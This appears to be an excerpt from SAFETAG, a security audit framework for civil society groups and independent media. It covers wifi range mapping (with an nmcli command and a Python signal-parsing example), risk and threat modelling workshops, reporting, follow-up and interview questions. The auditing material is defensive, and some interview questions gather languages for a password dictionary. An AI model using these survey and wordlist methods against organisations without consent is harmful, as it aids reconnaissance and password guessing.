It is worth noting that wifi access points are also tracked to assist in location services, and as such the location of a wireless network can be learned from its name or the MAC address of the access point. WiGLE is a community-managed database for such information, but both Google and Microsoft, and likely many others, also track this locational information, so the opt-out information below is only minimally useful.

Removal options: See wikipedia for public listings. Some opt-out options exist below:

Wireless Range Mapping

Summary

This component allows the auditor to show the "visibility" of an organization's wireless network to determine how far the organization's wireless network extends beyond a controlled area. Wireless networks are often trusted as equivalent to the hardwired office networks they have largely replaced, but they have important differences. Wireless networks are often "visible" from outside the walls of the office - from common spaces or even the street. Without further access, this reveals a wealth of information about the organization's size and the type of devices connecting to their network.

Overview

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjunction with the Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Materials Needed
Considerations
Walkthrough

Map the range of the organization's wireless network outside of the office space, using wifite or other tools to track network strength.

A variety of apps and tools can support this work without resorting to professional "wifi site survey" tools. If the Office Mapping exercise has taken place, that map can serve as the starting point to expand the map outside the office. If using a third party tool or app, ensure that the app is not sharing sensitive data. Using simple signal strength monitors in combination with location notes is more than sufficient. On Linux systems, one can use wavemon, kismet, wifite, and even the NetworkManager command line tools to track visible networks and their strengths, as described on StackExchange:

watch 'nmcli -f CHAN,BARS,SIGNAL,SSID d wifi list ifname wlx10feed21ae1d | sort -n'
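To turn such readings into the map this component asks for, here is an added example (not SAFETAG's code): it parses nmcli terse-mode scans taken at labelled survey points, keeps the strongest reading per point for one SSID, and reports the points outside the controlled area where the network is still usable. The scans, the survey-point names, the OUTSIDE set and the USABLE_SIGNAL cut-off are constructed assumptions, as is the nmcli invocation in the comment.

```python
"""Added example (not SAFETAG's code): turn nmcli scans taken at labelled
survey points into a per-location signal map for one SSID and report the
points outside the controlled area where that network is still usable."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Each scan is assumed to be the output of
#   nmcli -t -f CHAN,BARS,SIGNAL,SSID dev wifi list ifname <iface> --rescan yes
# run at the named survey point. Terse mode separates fields with ':' and
# escapes a literal ':' or '\' inside a value with a backslash.
# All scans below are constructed sample data.
SCANS: Dict[str, str] = {
    "office-desk": "6:▂▄▆█:84:SampleOrg\n11:▂▄__:40:Cafe\\: Free\n",
    "hallway":     "6:▂▄▆_:61:SampleOrg\n11:▂▄▆_:58:Cafe\\: Free\n",
    "street":      "6:▂▄__:35:SampleOrg\n1:▂___:20:SampleOrg\n",
    "parking-lot": "6:▂___:12:SampleOrg\n",
}
OUTSIDE: Set[str] = {"hallway", "street", "parking-lot"}  # points past the office walls
USABLE_SIGNAL = 30  # assumed cut-off; nmcli SIGNAL is a 0-100 percentage


@dataclass
class Reading:
    location: str
    channel: int
    signal: int
    ssid: str


def split_terse(line: str) -> List[str]:
    """Split one nmcli -t line on unescaped ':' and drop the escaping backslashes."""
    fields, current, i = [], [], 0
    while i < len(line):
        ch = line[i]
        if ch == "\\" and i + 1 < len(line):   # escaped ':' or '\' inside a value
            current.append(line[i + 1])
            i += 2
            continue
        if ch == ":":
            fields.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    fields.append("".join(current))
    return fields


def parse_scan(location: str, text: str) -> List[Reading]:
    readings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        chan, _bars, signal, ssid = split_terse(line)
        readings.append(Reading(location, int(chan), int(signal), ssid))
    return readings


def strongest_by_location(readings: List[Reading], ssid: str) -> Dict[str, int]:
    """Best SIGNAL seen for `ssid` at each survey point (several APs or bands
    may advertise the same name, so keep the maximum)."""
    best: Dict[str, int] = {}
    for r in readings:
        if r.ssid == ssid:
            best[r.location] = max(best.get(r.location, 0), r.signal)
    return best


def exposed_points(best: Dict[str, int], outside: Set[str],
                   threshold: int) -> List[Tuple[str, int]]:
    """Survey points outside the controlled area where the network is still
    at or above the usable threshold, strongest first."""
    hits = [(loc, sig) for loc, sig in best.items()
            if loc in outside and sig >= threshold]
    return sorted(hits, key=lambda pair: -pair[1])


if __name__ == "__main__":
    all_readings = [r for loc, text in SCANS.items() for r in parse_scan(loc, text)]
    coverage = strongest_by_location(all_readings, "SampleOrg")
    for loc, sig in exposed_points(coverage, OUTSIDE, USABLE_SIGNAL):
        print(f"{loc}: SampleOrg still at {sig}% outside the office")
```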

Recommendation

Depending on office layout, moving the wireless access point may help to reduce how far the network is transmitted outside of the office space, and changing devices which do not move to better enable this without loss of functionality.

See also Monitoring Open Wireless Traffic recommendations and Network Access security recommendations.

Process Mapping and Risk Modeling

Summary

This component allows an auditor to lead the host organization's staff in a series of activities to identify and prioritize the processes that are critical for the organization to carry out its work. These activities will also reveal the consequences if those critical processes were interrupted or exposed to a malicious actor. This results in the staff creating a risk matrix which is used as the foundation of the auditor's recommendations.

Purpose

Having the host organization central to the risk assessment process allows the auditor to put their threats and recommendations into the host's own narrative. With greater ownership of the process the staff will be more engaged in addressing the threats identified when the audit is complete. [67] By engaging as many staff as possible the auditor also provides a framework for staff to examine future concerns when the auditor is gone. The existing in/formal security practices captured during this process will be used to remove organizational and psycho-social barriers to starting new practices.

The Flow of Information

Risk Modeling Information Flow

Guiding Questions

Approaches

Note: Risk modeling will require a mixed approach of exercises, and the order which you identify each component will vary depending upon the organization.

If it was not possible to conduct these activities in person, you can conduct them remotely by applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Threat Modeling Resources (General)

Risk Assessment Activities

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Risk Matrix Activities

Risk Assessment: Chapter 2 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Alternative Risk Modeling Activities

Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Activities

Process Mapping

Summary

This activity helps to identify the processes that allow the organization to function (publishing, payment, fund-raising, outreach, interviewing), the assets and systems (websites, software, PayPal) they rely on, and which of these are critical to their work. (Activity)

Participants are asked to "brain-storm" a list of all the processes that are critical for their work and the auditor works to map the details of critical processes out to expose points of risk.

Overview

If it was not possible to conduct these activities in person, you can conduct them remotely by applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Materials Needed
Considerations
Walkthrough

The goal of this exercise is for the auditor to lead the host participants in "brain-storming" and mapping all the processes that are critical for the organization to carry out their work.

Additional Material

Getting Started

The auditor gives the participants a few example processes for a small independent media outlet.

Once the participants have brainstormed these out, the facilitator leads the participants in identifying the critical processes (this may be all of the processes identified).

The trainer then begins a free-hand process mapping activity for each process. You will be "charting the sequence of events of the work."

A Process Map shows

Conducting the Activity

NOTE: If an auditor does not ensure that the uniquely identified subset of processes speaks to the full range of participants, their recommendations are more likely to be met with resistance.

While doing this it is important to consider the level of detail you will be mapping out (this should be pre-determined or established so everyone is on the same page).

How to make a process map

This process map will be used to develop our asset map.

"Draw the flowchart initially to represent the operation, as it actually happens - NOT what you might prefer it to be! Use a flip chart or whiteboard to produce your initial charts"

"WHO does WHAT (Job title/Function e.g. Level A1)
WHAT is done and WHEN
What DECISIONS have to be taken and
What possible paths follow from each decision"

Keep it simple to facilitate broad understanding of the OVERALL process. Too much detail early on can be overwhelming and/or lead to confusion. If you agree that more detail is required on a particular action, it is easy to highlight that box and produce a separate chart showing the process taking place within.

Recommendation
This activity can lead to feelings of hopelessness; it is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Modeling Using the Pre-Mortem Strategy

Summary

The pre-mortem strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." [68]

Overview
Materials Needed
Considerations
Walkthrough
Additional Material

Getting Started

Conducting the Activity

Pre-Mortem Strategy: (30 Minutes) The pre-mortem strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan." [69]

Process/Interaction Mapping (30 minutes per process):

Recommendation
This activity can lead to feelings of hopelessness as well as stir up direct fears or challenges that the staff face. It is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Matrix

Covered in full in Threat Identification:

Critical Data Activity

Covered in full in Data Assessment:

Threat Assessment

Summary

This objective uses a variety of activities to identify possible attackers and gather background information about the capability of those attackers to threaten the organization. This consists of identifying a particular attacker's history of carrying out specific threats, their capability to carry out those threats currently, and proof that the threat has intent to leverage resources against the target.

Purpose

Checking the assumptions both of the organization and of the auditor by researching the current threats will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations. Greater ownership of the process gives the staff an opportunity to explore their threat landscape and makes them more engaged in addressing the threats identified when the audit is complete. By engaging with as many staff as possible the auditor is providing a framework for staff to explore threat identification processes when the auditor is gone.

The Flow Of Information

Threat Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Threat Modeling Resources (General)

Threat research by focus area

Threat research by method

General Threats by Region

Technical Threats

Targeted Malware
Censorship and Surveillance Reports

Travel Threats

Activities

Pre-Mortem Risk Modeling

Covered in full in Risk Assessment:

Critical Data Activity

Covered in full in Data Assessment:

Threat Identification

Summary

These activities build off of a process or data mapping exercise to connect the organization's actual processes, assets and data with potential threats, then drill down into the specific, likely threats the organization faces, the adversaries who might take advantage of them, and the impact of this happening.

The goal is to be able to answer the following questions:

Threat History

Threat Capability

Threat Intent

Overview
Materials Needed
Considerations
Walkthrough

Threat Identification: (30 minutes per process)

Impact Identification: (30 minutes per process) This exercise has the trainee lead the participants on a brainstorming of hypothetical consequences (impacts) when the threats identified earlier occur.

Adversary Exploration (Likelihood):

Impact Ranking: The goal of this exercise is to have the trainee lead the host organization in classifying the severity of the possible impacts from the threats they have just explored.

Recommendation

Creating a Risk Matrix

Summary
Overview
Materials Needed
Considerations
Walkthrough

After the activities are complete the auditor has tasks that build upon the outputs of the activities. These can be completed offsite.

Risk vs Difficulty
Risk vs Likelihood
Impact vs Severity
Recommendation

Threat Interaction

Summary

This helps the auditor enumerate threats that the organization is concerned about and the internal priorities of them. At the same time, it enables a discussion of how threats can interrelate and helps define the difference between a threat and a risk (a threat that has a vulnerability associated with it), and the value of mitigation.

This exercise works well with larger groups, and can be woven in to the Threat Identification activity.

Overview
Materials Needed
Considerations
Walkthrough

Also review the Threat Identification exercises to tailor these to best meet your information gathering needs based on your interactions with the organization.

Threat Brainstorming (15 minutes)

Split participants into small groups. This grouping is particularly valuable for larger organizations, but even for small ones, having multiple separate groups helps reveal shared concerns around the threats the staff face. For a group that is too small to split, have each staff member brainstorm individually.

Have each group or staff member quickly write down any possible "threat" they or the organization face. Some examples ("kidnapping," "website hacked") can help seed this activity.

If you have multiple colors of stickies, having them categorize threats by "physical," "digital," or "other/both" will be useful to show their inter-relation.

Keep reminding participants of the time remaining to keep them brainstorming rather than discussing threat details or arguing over whether a threat is physical or digital.

Threat Clustering and Discussion

After the brainstorming, gather and cluster the stickies on a wall, revealing duplicate concerns across the groups and thematic areas of concern.

As clusters become clear, ask whether any events similar to this threat have already happened to the organization. What was the impact? Has it happened more than once? Regularly? Mark these threats.

Note: Some of these threats may be traumatic experiences; consider skipping public discussion of historical occurrence if many of the threats from the brainstorm (or from one person/group in particular) are particularly intense.

Threat Bow-tie

Select one of the threats that emerged as a concern from the clustering to place at the center of a "bow-tie" like drawing on a whiteboard or flip-chart paper.

Begin asking what other threats identified could come as a result of this threat, supplementing the responses from the participants with additional threats. For example, a hacked website could lead to loss of trust by funders or partners. "Chain reactions" can be illustrated as lines of events (loss of trust by funders could lead to a loss of funding). Do the same for what threats could lead to the "central" threat - a confiscation of a device could lead to email hacking, for example. Some threats can be both potential causes and secondary effects.

Close out this with a discussion of how every threat is potentially connected to both digital and physical impacts.

Recommendation

Regional Context Research

Covered in full in Capacity Assessment:

Responsive Support

Summary

The auditor provides assistance for any immediate action needed (spot training, tool fixes, consulting on upcoming projects) -- this may also involve addressing vulnerabilities that triggered an incident response.

Purpose

In-audit activities and training are used to increase an organization's agency to seek out and address immediate security challenges within their organization, as well as enabling the organization to securely receive and store the audit report.

The Flow of Information

Responsive Support Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Facilitation Preparation

Digital Security Trainings

Digital Security Guides

Training Resources

Activities

Due to the wide variety of needs found during SAFETAG audits, the framework relies on the wealth of existing training curricula and digital security guides, listed below.

Of specific use are the following training guides from Level-Up. Review the Level-Up Curricula Guide prior to using these activities:

Debrief

Summary

This component consists of an out-brief to key points of contact, providing basic pressure relief through group and individual interactions, and planning future follow-up with the host and key individuals.

Purpose

SAFETAG is an auditing framework designed to connect small civil society organizations and independent media outlets to the digital security services they need. But, more than that it is designed to provide audits that increase an organization's agency to seek out and address security challenges independently. This can be an auditor's last in-person chance to engage with the staff to shape their perspective of the audit.

The debrief allows the auditor to ensure that they leave the host and its staff ready to start addressing their digital security. By providing some immediate outcomes to the host and its staff, and in combination with training or security consultation in the Responsive Support section, the auditor can ensure that the host sees the audit as a guide instead of a condemnation.

The Flow of Information

Debrief Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Facilitation Preparation

Activities

Follow Up

Summary

This component allows an auditor to explain and get feedback on their report as well as evaluate the success of the process over time through a continued relationship with the host.

This component consists of the final meeting with the host and following up with them after a period of a few months to see if they need further assistance, are willing to share their experience working with any of the recommended resources, or as new resources are identified.

Purpose

Follow up can be a valuable tool for encouraging an organization to continue their digital security process. But, follow up needs to be desired by an organization and achievable for the auditor. As such, follow up must be minimally intrusive on both the auditor and the host's time.

The Flow of Information

Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Resource Lists

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme (see also the "Alternative Sources of Funding" list on this page)

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Digital Security Trainings

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Activities

Follow-up Meeting

Summary

Schedule and have a follow up call to discuss the audit report. This provides a valuable touch-point for the organization to read the report and ask any clarifying questions to the auditor, as well as for the auditor to underscore any important steps for the organization.

Overview
Materials Needed
Considerations
Walkthrough

Each organization, and often even each key point of contact within the organization, will want to explore the report in different ways. Adapt to the needs of the organization, but make sure you cover the top-priority recommendations that the organization needs to consider in the immediate future.

Ask the organization to fill out Staff Feedback Surveys.

Ask if they need any specific resources or introductions not included in the report.

At the end of the call, schedule a second follow-up call to check in on their progress.

Recommendation

Making Introductions

Summary

Make introduction between host and known resources as needed.

Overview
Materials Needed
Considerations
Walkthrough

Based on the specific recommendations in the audit report, as well as the auditor's understanding of the organization's capacity and barriers faced, introduce the relevant points of contact at the organization to resources such as digital security trainers, funding organizations which provide targeted support for digital security, technical experts to help on specific tasks (e.g. server hardening, website migration), as well as services that could help address their needs (e.g. secure hosting providers, rapid response support).

Follow up with both the organization and the resources introduced to check in on progress and revise which introductions you make going forward.

Recommendation

Long-Term Follow-up

Summary

Follow up with host after a few months to check on progress, get long-term feedback and connect with any new resources.

Overview
Materials Needed
Considerations
Walkthrough

This can be combined with the Staff Feedback Survey exercise, or to follow up on any concerns you have based on their responses to that survey. The main goal of the long-term follow-up is to ensure that the organization has ongoing connection points to any resources or connections they need to remove barriers to adoption.

Recommendation

Staff Feedback Survey

Summary

Providing a space for anonymous, guided feedback is valuable to gather information about how your audit work and the SAFETAG framework itself are supporting organizational understanding of risk and their ability to adapt. This long-term capacity building is critical to the SAFETAG framework, so finding ways to measure the impact of an audit towards these goals is important.

Overview
Materials Needed
Considerations
Walkthrough

This exercise provides a simple survey you can implement in a variety of settings (Google Forms, SurveyMonkey, via plain documents, etc.).

Sample Survey Questions

  1. Before the audit:

     Completely False | False | I don't know | True | Completely True
     I understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
     I understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
     I understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
     The auditor understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
     The auditor understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
     The auditor understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]

  2. After the audit:

     Completely False | False | I don't know | True | Completely True
     I understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
     I understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
     I understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]
     The auditor understood the risks my organization faces. [ ] [ ] [ ] [ ] [ ]
     The auditor understood the risks that I personally face. [ ] [ ] [ ] [ ] [ ]
     The auditor understood the risks that my organization's beneficiaries face. [ ] [ ] [ ] [ ] [ ]

  3. Do you feel the audit took a reasonable amount of time?
  4. Do you have any immediate behavioral changes you intend to make because of the audit?
  5. Did the auditor provide you everything you need to start addressing your digital security?
  6. Did any training that you received specifically address the risks identified during the audit?
  7. Did the recommendations made by the auditor directly address the digital security needs you identified during the audit?
  8. Did the recommendations made by the auditor address the digital security needs of your organization?
  9. The recommendations from the audit...
 10. The biggest barrier you see to implementing the auditor's recommendations is....

Recommendation

Reporting

Recommendation Development and Resource Identification

Summary

In this component the auditor identifies the organization's strengths and weaknesses (expertise, finance, willingness to learn, staff time, etc.) in adopting new digital and physical security practices, and documents the possible actions the organization could take to address the vulnerabilities found during the audit, the difficulty of taking on those actions, and the resources that the host may be able to leverage to address them. Resources can include, but are not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Purpose

The host needs to be able to take action after an audit. The recommendations that an auditor provides to address vulnerabilities must cover a range that allows an organization to address them in both the short-term and more comprehensively in the long-term. Knowing an organization's strengths and weaknesses will allow the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. In doing this the SAFETAG auditor has an opportunity to act as a trusted conduit between civil society organizations in need and organizations providing digital security training, technological support, legal assistance, and incident response.

Guiding Questions

Approaches

Identify Useful Resources

Resource Identification

Summary

In this component the auditor documents resources that the host may be able to leverage to address the technical, regulatory, organizational, or behavioral vulnerabilities identified during the audit.

This can include, but is not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Identify and Explain Un-Addressed Concerns

Summary

Write explanations for why any adversaries or threats the auditor identifies are "un-addressable" with the organization's current capacity.

Base Line Skills
Operational Security
Materials Needed
Considerations
Output
Resources

Identify Recommendations

Summary
Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Outputs

Operational Security

Resources

Digital Security Guides

Digital Security Guides

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme (see also the "Alternative Sources of Funding" list on this page)

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Training Resources

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Resource Lists

Recommendation Development

Activities


Roadmap Development

"Finding threats against arbitrary things is fun, but when you're building some-thing with many moving parts, you need to know where to start, and how to approach it." - Threat Modeling: Designing for Security by Adam Shostack 81

Summary

This component consists of an auditor sorting their recommendations in relation to the organization's threats and capacity. The auditor prioritizes vulnerabilities, weighs the implementation costs of recommendations and then creates an actionable roadmap for the organization to make their own informed choices about possible next steps as they move forward.

Purpose

As part of SAFETAG's dedication to building agency and supporting organizational adoption of safer practices, a careful prioritization of vulnerabilities is invaluable in keeping audit results from appearing overwhelming. An organization needs to be able to weigh their possible paths forward against the time lost from program activities, the cost of addressing the threat, and the other threats that they are not addressing. Roadmapping is used to give the host the tools to make these decisions and provide them with a recommended path forward that will allow them to make immediate gains towards protecting themselves. The existing in/formal security practices captured during this process will be used to remove organizational and psycho-social barriers to starting new practices.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

Determining the urgency of a vulnerability

Activities

Report Creation

"A good analysis might turn the threats into stories so they stay close to mind as software is being written or reviewed. A good story contains conflict, and conflict has sides. In this case, you are on one side, and an attacker is the other side." - Threat Modeling: Designing for Security 83

Summary

This component consists of an auditor compiling their audit notes and recommendations into a comprehensive set of documents that shows the current state of security, the process by which the auditor came to that assessment, and recommendations that will guide the host's progression towards its security goals.

Purpose

Once an auditor has left, the report is the auditor's chance to continue a conversation (albeit a static one), even if the organization never talks to the auditor again. If written with care it can be a tool to encourage agency and guide adoption. The report has many audiences who will need to use it in different ways. For the auditor and the organization, it acts as documentation of what the auditor accomplished. For the organization, it will be a guide for connecting vulnerabilities to actual risks, a rallying cry for change, and proof of need for funders. For those the organization brings in to support their digital security, it provides a roadmap towards implementation and a task list for future technologists and trainers paid to get the host there, as well as a checklist for validating that threats have been addressed.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

Activities

APPENDICES

APPENDIX: How to read SAFETAG

Major Sections

The Life Cycle of an Audit

This section contains explanations of the goals of the SAFETAG process and definitions of the major terminology.

Objectives

This section contains the objectives of a SAFETAG audit. These are collections of specific activities that an auditor may use to gather and confirm information about the risks an organization faces, their capacity to address them, and potential threat actors.

Reporting

This section contains the post-audit objectives used to document the organization's risks and the auditor's recommendations based upon a final capacity and risk assessment.

Objective Components

Summary

A short - one to four sentence - basic overview of the objective.

Purpose

The justification for why we have included this objective.

The Flow of Information

The purpose of audit activities is to acquire risk assessment and mitigation information. As this information is acquired, earlier audit steps will have to be re-visited based upon updated information. The "Flow of Information" shows the types of information that an audit objective builds upon (input), and the types of information that it may reveal (outcomes).

Guiding Questions

Each audit objective is guided by a small set of core questions. Key questions are included to help an auditor identify when they have acquired enough information and customize their approach while still collecting the correct types of information to support the organization.

Approaches

Many of these objectives can be completed in multiple ways depending upon auditor skill and the organization's technical setup and capacity. The approach section includes a list of activities that can be used to carry out part, or the whole, of the information collection for an audit activity.

Resources

Links to resources that can be used to deepen an auditor's understanding.

Activities

Summary

A short - one to four sentence - basic overview of the activity.

Base Line Skills

The baseline level of skills that the auditor must possess in order to carry out the intended activity.

Operational Security

Operational security guidelines that are specific to this activity.

Materials Needed

Any materials beyond the norm that the auditor will need.

Instructions

Where relevant, an outline of the steps an auditor will take during this activity. Not intended to replace the tools' own documentation, but useful for an auditor unable to connect to the Internet, or as something to hand to the organization's technical contact.

Considerations

Some of the activity specific concerns (ethical, skill level, time, relationship, etc.) that an auditor must take into consideration when conducting this activity.

Output

Notes on what data can be created during this activity.

Resources

Links to resources that can be used to deepen an auditor's understanding of an activity.

APPENDIX: Draft Engagement and Confidentiality Agreement

In order to protect the privacy of SUBJECT, AUDITOR agrees to comply with the following restrictions:

APPENDIX: Travel Kit and Checklist

Travel Kit Checklist

Hardware
Software / digital resources
Facilitation Supplies
Logistics

APPENDIX: Sample Capacity Interview Questions

Introduction

For this interview, I will mostly ask you about how your organization relates to tech tools in a general sense. I will also ask specific questions about how your organization works with digital security issues.

Together, this information will help me identify ____________

All of the information we collect here will be kept completely private.

This interview will last approximately ____ hour.

Please feel free to stop me or ask if a question is unclear, or if you would like to take a break.

The interview starts with some questions about you and the organization. Again, this will all be kept strictly confidential.

Open Up

"Warm up the participant with questions they are comfortable with." 85

  1. What is your name?
  2. What is your position in the organization?
  3. What are your main responsibilities in this organization?
  4. When was the organization created?
  5. What issues does the organization work on? (Provide an example if needed - Examples below)
    • Human Rights
    • Transparency
    • Public Service Delivery
    • Health
    • Free Media and Information
    • Climate Issues
    • Gender Issues
    • Poverty Alleviation
    • Community Building
    • Peace promotion
    • Agricultural Development
    • Entrepreneurship
    • Water, Sanitation
    • Transportation
    • Disaster Relief
    • Other
    • No Specific Mandate
  6. Where does your organization have activities?
  7. Does the organization have activities in more than one (city/province/country/region)?
  8. What kind of funding does your organization receive?
  9. Could you tell me, approximately, what percentage of the organization's current annual budget is dedicated to supporting the use of digital or mobile technology?
  10. How many projects is your organization currently managing?
  11. Does the organization have its own office space?
  12. Does the organization have a domain name or brand identity that is used for all online communications?
  13. What is the organization’s working language? (for password dictionary)
  14. What other languages are used by the organization, formally or informally? (for password dictionary)
  15. In what language has your organization accessed online resources to support its work?
  16. How many paid, full-time staff does the organization employ?
  17. How many paid, part-time staff does the organization employ?
  18. How many unpaid workers, such as volunteers or interns work at least one day a month at the organization?
  19. Does the organization have a staff member responsible for working with digital or mobile technology?
    • Yes, more than one
  20. Is this staff member responsible for any of the following areas?
    • Office IT infrastructure
    • Internet Presence or website
    • Outreach or communications
    • Managing programs
  21. How regularly do staff members of the organization travel outside of your country?
  22. Does the organization do any of the following activities when travelling internationally?
    • Run programs
    • Participate in events
    • Run trainings
    • Receive trainings
    • Fundraising
Go Broad

"Prompt bigger, even aspirational, thinking that they may not be accustomed to on a daily basis." 86

Go Specific

"Dig deeper on the challenge at hand & prompt with ‘what if’ scenarios." 87

  1. What is the most important reason for your organization to exist? (Provide an example if needed - Examples below)
    • To raise awareness in the organization's policy area.
    • To impact policy.
    • To improve policy.
    • To improve service delivery.
    • To change specific legislative or administrative governance structures.
    • To provide citizens with a greater voice in public affairs and deliberations
    • To expose corruption or malfeasance
    • No concrete strategic objectives.
  2. Does the organization provide services directly to individuals (for example health, educational or legal service?)
  3. What type of direct services does the organization provide? (Provide an example if needed - Examples below)
    • Legal Services
    • Health Services
    • Education Services
    • Water/Sanitation Services
    • Financial Services
    • Other Services
  4. Does the organization primarily rely on digital media in its work?
  5. Does your organization use....
    • Email
    • Email newsletters
    • Websites
    • Maintain blog or discussion fora, or another social media account(s)
    • Engage in online discussions and interactions on external sites
    • Maintain interactive websites
    • Paid software (like Microsoft Office or Basecamp) to manage the organization or projects
    • Free branded platforms (like Google Apps) to manage the organization or projects
    • digital or mobile tools to collect data or evidence
    • Digital or mobile tools to deliver health, financial, or other public services
    • Mass communication to mobile phones
    • security software (anti-virus, circumvention tools, etc)
    • disseminate information through third party sites and platforms.
    • Other
  6. What other digital tools does your organization use?
  7. What are the most important motivations for the organization to use these tools?
  8. Are there any specific outcomes for the organization’s stakeholders that you hope digital or mobile technologies can facilitate?
  9. Does the organization have specific plans to increase its capacity to use digital or mobile technologies in its work?

  10. Do the organization’s staff have access to computers for their work?
  11. How many staff members do not have access to their own computer or need to share computers with other?
  12. How many people of the organization’s staff currently use digital or mobile technology on a daily basis?
  13. How many of the organization’s currently active projects would not be possible without the use of these media?
  14. Does the organization have a hierarchy for decision- making, according to which different people have different responsibility and levels of authority?
  15. Has the organization used any of the following methods to build skills and capacities for using digital or mobile technologies?
    • Local Training
    • Training in other countries
    • Online Training
    • Purchasing equipment or hardware
    • Hiring consultants
    • Hiring staff or restructuring human resources
    • Devoting staff time to independent learning
    • participating in international events
    • searching and learning online
  16. Which other method(s) to build skills for using digital and mobile technologies?
  17. Have these efforts to increase capacity targeted specific staff members in the organization?
  18. Has the organization actively worked to strengthen its digital security in the last year?
    • (IF NO) Why did the organization not work to strengthen its digital security in the last year?
    • (IF YES) How did the organization work to strengthen its digital security in the last year?
  19. Which of the below factors are the three most significant obstacles to the efficient use of digital and mobile technology by your organization?
    • Limited skills of staff
    • Limited infrastructure for media or electricity.
    • Limited technical literacy and media use among staff
    • limited financial resources
    • Insufficient hardware or software
    • None
    • Other
    • don't know
  20. What new activities using digital or mobile technologies would the organization like to attempt in the future? Please give examples of programs, activities, or management functions...
  21. Has the organization used the internet (including online training, discussions or research) to get better at any of the following activities.
    • Communicating with stakeholders and raising awareness on issues.
    • Keeping the organization and its staff safe.
    • Fundraising and developing the organization’s strategic focus.
    • Managing staff and organizational activities (such as payroll, hiring and other administration)
    • Measuring impact of programs.
  22. Why are you having the audit done?
  23. How well do you believe your organization is able to identify appropriate digital and mobile technology tools for the organization’s work?
  24. How well do you believe your organization is able to use appropriate digital and mobile technology tools for the organization’s work?
  25. Has turnaround in staff members been a problem for retaining technical capacity in your organization?
  26. In what ways, if any, have you experienced that technology inhibits the organization’s work?
  27. Are there systems on the network which the client does not own, operate, or rely on, that may require additional approval to test?
  28. Does the organization communicate with its beneficiaries/members/sources?
    • How does the organization communicate with its beneficiaries/members/sources?
  29. Does the organization use any of these tools to maintain information about its members?
    • Paper lists
    • Mobile phone contact lists
    • Email contact lists
    • Spreadsheets
    • CRM (customer relationship management software)
    • Other
  30. What other tools does the organization use to maintain information about its members?
  31. I will now read a list of hardware tools you might be familiar with. From this list, could you please tell me about the three tools that are most important to the organization?
    • Desktop computers
    • Laptop Computers
    • Mobile Phones
    • Satellite Phones
